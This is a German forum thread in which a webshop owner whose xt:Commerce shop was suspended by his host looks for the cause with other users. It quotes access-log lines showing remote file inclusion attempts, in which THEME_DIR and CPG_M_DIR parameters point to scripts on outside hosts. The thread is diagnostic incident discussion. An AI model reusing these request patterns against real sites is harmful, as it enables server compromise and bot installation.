coppermine bug

[tufti]

Hallo,

habe von Hosteurope die Nachricht erhalten, daß mein Webshop gesperrt ist. Anscheinend ist versucht worden, diesen zu hacken.Und zwar product_info.php/info//modules/coppermine/themes/default/theme.php?THEME_DIR=

Nach Recherchen liegts an Coppermine. Da der jetzt gesperrt ist, kann ich nicht sagen obs, xt-commerce 3.0.3 0der 3.0.4 ist

[c-ool]

hmmm, und was ist jetzt die frage?

[SonjaSt]

Joa, zumal dies ist xt:c ist - Coppermine ist eine Webgalerie, die man meines Wissens nicht mit xt:c kombinieren kann.

Sollte also jemand versucht haben Deine Coppermine Galerie zu hacken, und Dein Hoster hat deswegen Dein komplettes Paket zu sperren, so dass demnach auch Dein xt:c Shop gesperrt ist, betrifft das doch die anderen xt-c User nicht.

Oder steh ich auf dem Schlauch?

[tufti]

ist denn coppermine nicht in xtc integriert? Die Frage ist gibts ein Update?

[tufti]

Also ich glaube irgendwas stimmt nicht. Habe das Original-xtc ohne irgendwelchen Themes. Das einzige ist Anbindung an cao. Was hat dann die obige Meldung ausgelöst, die mir von Hosteurope geschickt wurde?

[SonjaSt]

Also ich glaube irgendwas stimmt nicht. Habe das Original-xtc ohne irgendwelchen Themes. Das einzige ist Anbindung an cao. Was hat dann die obige Meldung ausgelöst, die mir von Hosteurope geschickt wurde?

xt:c hat keine Themes, sondern Templates

Coppermine hat Themes.

Wäre ja genial, wenn xt:c und coppermine eins wären

[tufti]

Ich meinte templates

[SonjaSt]

Hast Du denn coppermine ins xt:commer integriert bzw umgekehrt?

Oder wie lief das bei Dir ab, wenn nun "beides" gesperrt ist?

[SonjaSt]

Ich meinte templates

"Original xt:c ohne Templates" gibt es nicht.

Das Template wird gebraucht, damit der Shop im Browser überhaupt erst aufgerufen und dargestellt werden kann.

[c-ool]

Also ich fasse mal zusammen:

Du hast einen Webshop auf xtc-Basis. Also sogar einen Original-Xtc und keinen Abkömmling (Fork) gibt da so ein paar von.

Außerdem hast Du eine Galerie auf der Basis von Coppermine.

Beides sind eigenständige Systeme, die (normalerweise) nicht ineinandergreifen. Wenn Du das doch geschafft hast - dann wird die Art und Weise wie Du das gemacht hast die User hier sehr interessieren. Wo hast die den Mod/Bridge/Hack her?

Ob man zum Design/Layout nun Theme, Template oder sonstwie sagt ist ja egal - wäre bloß ein Wörter auf die Goldwaage legen.

Tatsache ist Dein Shop wird ein Template am Laufen haben (anders geht es nicht) und Deine Galerie ebenfalls (dort heißt es bloß Theme).

Nun hat Hosteurope Deinen Shop lahmgelegt weil Deine Galerie gehackt wurde?

Welche Infos konnte Dir HE denn dazu geben?

Hat jemand die Datenbank manipulieren können oder den Webspace?

Wenn der Webspace gehackt wurde ... oha, dan ist es ganz schön fatal ... sieh mal zu dass Du das Leck schließen lässt damit Du wieder vernünftig arbeiten kannst. Aber da der Angriff über Coppermine kam bist dafür hier im falschen Forum.

Wenn es aber die Datenbank war die gehackt wurde, dann wären weitere Fragen zu stellen. Hast Du etwa für die Galerie und den SHop dieselbe Datenbank genommen? Das ist zwar grundsätzlich kein Problem, ber sicherheitstechnisch ist das riskant. Wenn nämlich eines der Systeme Lücken aufweist riskierst Du auch gleich das andere System (in diesem Fall den Shop).

Die Lösung wäre dann: deinstalliere die Galerie und entferne die Tabellen der Galerie aus Deiner Shop-Datenbank. Dann lasse den Shop vom Hosteurope-Support wieder freischalten. Willst DU nun die Galerie wieder installieren sorge dafür, dass sich die beiden Systeme nicht überschneiden und auch eigene Datenbanken bekommen, so minimierst Du das Risiko wenn die eine Sache gehack wurde, dass auch die andere gleich beeinträchtigt ist.

Ich hoffe geholfen zu haben.

[tufti]

Hallo,

danke für die ausführliche Antwort. Ich habe nur xt-commerce original mit original Template. Ich habe kein coppermine installiert.

Ich habe von Hosteurope folgende Nachricht erhalten:

gesperrtes Verzeichnis: /is/htdocs/xyz/

Begründung: unsichere Skripte

Kommentar: Bot ausgeführt auf Webpack Server

nobody 1858 0.0 0.0 0 0 ? D 01:43 0:30 [apache2]

Anscheinend wurde ein Skript in /is/htdocs/xy/www/shop ausgenutzt, um externe Befehle ausführen. Bitte schauen Sie sich diesbzgl. Ihr access.log an zwecks Analyse.

Habe nachgefragt wo ich die access.log finde, als Antwort kam dieses:

/shop/product_info.php/info//modules/coppermine/themes/default/theme.php?THEME_DIR=

lassen sich mit Hilfe von Parametern diverse BOTs einschleusen.

Bitte ändern Sie Ihr Script soweit ab, dass ein einschleusen von BOTs nicht mehr möglich ist

[c-ool]

sehr interessant - damit hätten wir noch keinen hinweis darauf wo dieses verzeichnis sein soll

die letzte ebene, die nachvollzogen werden kann ist die product_info.php

lösche die doch mal von Deinem Server und spiele die Originale product_info.php nochmal ein.

dann ändere deine ftp-zugangsdaten ... damit du sicher gehen kannst dass die niemand außer dir hat.

dann gebe doch in der suche deines shops doch mal "coppermine" ein, denn es gild herauszufinden wo denn das herkommen soll ... kann eigentlich nur in deinen produkten stehen (deshalb die Suche deines shops nutzen ... die klappert alle produkte ab)

seltsame sache das ...

[SonjaSt]

/shop/product_info.php/info//modules/coppermine/themes/default/theme.php?THEME_DIR=

Ich hab mir in meiner Coppermine Gallery mal die theme.php angeschaut.

Der Code lautet:

<?php

/*************************

  Coppermine Photo Gallery

  ************************

  Copyright (c) 2003-2005 Coppermine Dev Team

  v1.1 originally written by Gregory DEMAR


  This program is free software; you can redistribute it and/or modify

  it under the terms of the GNU General Public License as published by

  the Free Software Foundation; either version 2 of the License, or

  (at your option) any later version.

  ********************************************

  Coppermine version: 1.4.3

  $Source:

  $Revision:

  $Author:

  $Date:

**********************************************/


define('THEME_HAS_RATING_GRAPHICS', 1);


$template_sys_menu_spacer ='::';


}


?>[/PHP]

Vielleicht hilft das in irgendeiner Form?

[tufti]

Heute genaue Antwort von Hosteurope bekommen:

/shop/product_info.php/info/p52_Titan-TTC-CU4TB.html/modules/coppermine/themes/default/theme.php?THEME_DIR=ht

tp://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 200 29827 "-" "libwww-perl/5.803" "www.xyz.de"

217.160.16.207 - - [13/Dec/2007:15:48:03 +0100] "GET /shop/product_info.php/info/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mta.cl/galeria2/

galery.txt??? HTTP/1.1" 200 30272 "-" "libwww-perl/5.803" "www.xyz.de"

82.112.124.79 - - [15/Dec/2007:14:42:23 +0100] "GET /shop/product_info.php/info//include/init.inc.php?CPG_M_DIR=http://www.golovaliyiz.com/yedek/can? HTTP/1.1" 20

0 30340 "-" "libwww-perl/5.65" "www.xyz.de"

82.112.124.79 - - [15/Dec/2007:14:42:24 +0100] "GET /shop/product_info.php//include/init.inc.php?CPG_M_DIR=http://www.golovaliyiz.com/yedek/can? HTTP/1.1" 200 302

09 "-" "libwww-perl/5.65" "www.xyz.de"

151.1.191.211 - - [16/Dec/2007:02:01:57 +0100] "GET /shop/product_info.php/info/p52_Titan-TTC-CU4TB.html//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt? HTTP/1.1" 200 29851 "-" "libwww-perl/5.65" "www.xyz.de"

151.1.191.211 - - [16/Dec/2007:02:02:00 +0100] "GET /shop/product_info.php/info//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.hobbiz.com/ima

ges/powered/_vti_cnf/echo2.txt? HTTP/1.1" 200 30285 "-" "libwww-perl/5.65" "www.xyz.de"

151.1.191.211 - - [16/Dec/2007:02:43:22 +0100] "GET /shop/product_info.php/info//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.hobbiz.com/ima

ges/powered/_vti_cnf/echo2.txt? HTTP/1.1" 200 30255 "-" "libwww-perl/5.65" "www.xyz.de"

151.1.191.211 - - [16/Dec/2007:02:43:25 +0100] "GET /shop/product_info.php//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.hobbiz.com/images/p

owered/_vti_cnf/echo2.txt? HTTP/1.1" 200 30398 "-" "libwww-perl/5.65" "www.xyz.de"

81.169.141.96 - - [16/Dec/2007:11:29:27 +0100] "GET /shop/product_info.php/info/p52_Titan-TTC-CU4TB.html//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

http://www.resultx.xpg.com.br/bot/id.txt? HTTP/1.1" 200 29783 "-" "libwww-perl/5.803" "www.xyz.de"

81.169.141.96 - - [16/Dec/2007:11:29:27 +0100] "GET /shop/product_info.php/info//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.resultx.xpg.co

m.br/bot/id.txt? HTTP/1.1" 200 30285 "-" "libwww-perl/5.803" "www.xyz.de"

Meine Website habe ich in www.xyz.de umgeändert.

Als Nachtrag stand noch: Bitte aktualisieren Sie auf die neuste xt-commerce Version.

Titan-TTC-Cu4tb ist ein Artikelname und ist für coppermine-Prozessoren geeignet. Toll!!

[c-ool]

du sollst auf die aktuelle version updaten?

welche version läuft denn bei dir?

[tufti]

Kann die genaue Version nicht mehr feststellen, da der Shop nicht mehr läuft. Habe nur noch Zugriff über FTP. Habe im changelog.txt nachgeschaut, aber da steht nichts. Gibts ne Möglichkeit über mysql ?

[c-ool]

Na vor allem gibts nur ne vernünftige Möglichkeit upzudaten, wenn der webspace auch fürs internet bzw. den aufruf über browser freigegeben ist.

Ich find's schon ein wenig merkwürdig von HE so zu reagieren - ich kann mir kaum vorstellen dass Dein Shopscript so bugzerfressen sein kann, dass die Angst um ihren Server oder die anderen Kunden auf ihrem Server haben müssen.

Die sollen mal Deinen Account wieder freigeben oder den Fehler selber beheben ... finde es schon seltsam, dass die verlangen dass Du bestimmte Systeme (in dem Fall eben ein veraltetes xtc) nicht einsetzt.